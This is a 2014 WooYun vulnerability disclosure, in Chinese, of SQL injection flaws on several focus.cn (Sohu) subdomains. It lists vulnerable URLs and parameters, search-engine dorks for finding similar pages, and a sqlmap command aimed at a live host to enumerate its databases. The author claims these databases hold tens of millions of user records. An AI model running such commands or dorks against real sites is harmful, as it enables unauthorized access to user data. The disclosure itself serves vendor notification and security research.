漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-057453
漏洞标题:搜狐旗下某站二级域名下三处sql注入之八(POST&GET)
相关厂商:搜狐
漏洞作者: 浩天
提交时间:2014-04-18 17:39
修复时间:2014-06-02 17:40
公开时间:2014-06-02 17:40
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-18: 细节已通知厂商并且等待厂商处理中
2014-04-18: 厂商已经确认,细节仅向厂商公开
2014-04-28: 细节向核心白帽子及相关领域专家公开
2014-05-08: 细节向普通白帽子公开
2014-05-18: 细节向实习白帽子公开
2014-06-02: 细节向公众公开
简要描述:
连载7没给过,那和这个8一起合并吧,找点真心不容易吖 @疯狗
3+3=6个,打个大包,还都是子站通用的,这里面有涉及7个库,那里面是“数千万用户信息”那个,呵呵
详细说明:
1.POST注入:
http://hnmsg.focus.cn/group/vinvite.php
post内容:group_id=270135&name%5B%5D=zhangchao
....
site:focus.cn inurl:invite.php?group_id=
sqlmap -u "http://hnmsg.focus.cn/group/vinvite.php" --data "group_id=270135&name%5B%5D=zhangchao" --dbs
7个库,你懂的!!数千万用户....
漏洞证明:
GET注入:
2.
http://shopimg.focus.cn/rentsale/view.php?rent_id=448417
http://shop.gz.focus.cn/rentsale/view.php?rent_id=329922
http://shop.sh.focus.cn/rentsale/view.php?rent_id=329922
....
site:focus.cn inurl:view.php?rent_id=
3.
http://shop.sh.focus.cn/rentsale/hire_list.php?region_code=310105
http://shop.gz.focus.cn/rentsale/hire_list.php?region_code=440111
....
site:focus.cn inurl:hire_list.php?region_code=
修复方案:
合并一下,测试其他问题,测着测着就发现sql注入了,我是不是跑偏了
版权声明:转载请注明来源 浩天@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-04-18 17:54
厂商回复:
感谢支持。
最新状态:
暂无